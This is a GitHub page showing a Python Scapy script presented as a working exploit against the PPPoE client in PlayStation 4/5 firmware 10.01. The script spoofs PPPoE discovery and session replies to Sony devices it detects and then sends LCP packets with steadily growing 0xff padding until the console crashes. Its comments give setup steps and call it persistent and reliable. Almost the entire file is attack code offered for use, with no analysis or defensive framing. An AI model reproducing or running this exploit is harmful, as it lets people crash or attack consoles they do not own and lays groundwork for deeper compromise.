-
Notifications
You must be signed in to change notification settings - Fork 0
/
main.py
100 lines (74 loc) · 3.18 KB
/
main.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
from scapy.all import PPPoED, Ether, sniff, sendp, srp1, hexdump, get_if_hwaddr, conf
from manuf import manuf
import struct
# This exploit works 100% of the time and is perstitant, you can leave it running.
# It will automatically get src ip and dst ip
# Sometimes the pppoe client will send out random information (nothing useful)
# connect PC to ps4, ps5
# Setup lan connection with pppoe
# run the script after setting interface (ifconfig /all, or ip addr).
# restart playstation, or network test.
# Enjoy your reboot
# FW: 10.01
# need gadget from kernel dump
interface = "Realtek PCIe GbE Family Controller"
p = manuf.MacParser(update=False)
conf.verb = False
mac_address = get_if_hwaddr(interface)
mac_address_packed = struct.pack('!6B', *[int(byte, 16) for byte in mac_address.split(':')])
while True:
success = False
src_address = ""
src_address_packed = b""
manufacture = ""
tag_value = ""
print("Listening for incoming packets from Sony")
while True:
packet = sniff(iface=interface, filter="pppoed", count=1)
try:
if Ether in packet[0]:
src_address = packet[0][Ether].src
src_address_packed = struct.pack('!6B', *[int(byte, 16) for byte in src_address.split(':')])
manufacture = p.get_manuf_long(src_address)
if "Sony" in manufacture:
tag_value = packet[PPPoED][0].tag_list[1].tag_value
success = True
break
except:
pass
if (success == False): continue
print(f"Got source address from playstation! [{src_address}] [{manufacture}] [{tag_value}]")
payload = src_address_packed + mac_address_packed + b"\x88\x63\x11\x07\x00\x00\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
print("Sent the PPPoE Discovery Request packet")
packet = sniff(iface=interface, filter="pppoed", count=1)
payload = src_address_packed + mac_address_packed + b"\x88\x63\x11\x65\x00\x01\x00\x0c\x01\x03\x00\x08" + tag_value
sendp(payload, iface=interface)
print("Sent the PPPoE Session Request Packet")
packet = sniff(iface=interface, filter="pppoes", count=1)
payload = src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff"
packet = srp1(Ether(payload), iface=interface)
# i = 0
# while True:
# i += 1
# packet = sniff(iface=interface, filter="pppoes", count=1)
# payload = src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xFF" * i
# packet = srp1(Ether(payload), iface=interface, timeout=2)
# if not packet:
# print("Broke on " + str(i))
# break
# hexdump(packet)
# exit(0)
print("Sent the PPPoE Session Data Packet with Ethernet II Encapsulation")
# in network test -> 249
# in boot -> 22 (ssdp:discover)
# in network test -> 26 (tCanShortCircuit)
i = 0
while True:
i += 1
sendp(src_address_packed + mac_address_packed + b"\x88\x64\x11\x00\x00\x01\x00\x09\xc0\x21\x01\x01\x00\x07\xab\xff" + b"\xff" * i, iface=interface)
packet = sniff(iface=interface, filter="pppoes", count=1, timeout=5)
if not packet:
print("We crashed the system on payload " + str(i))
break
packet.hexdump()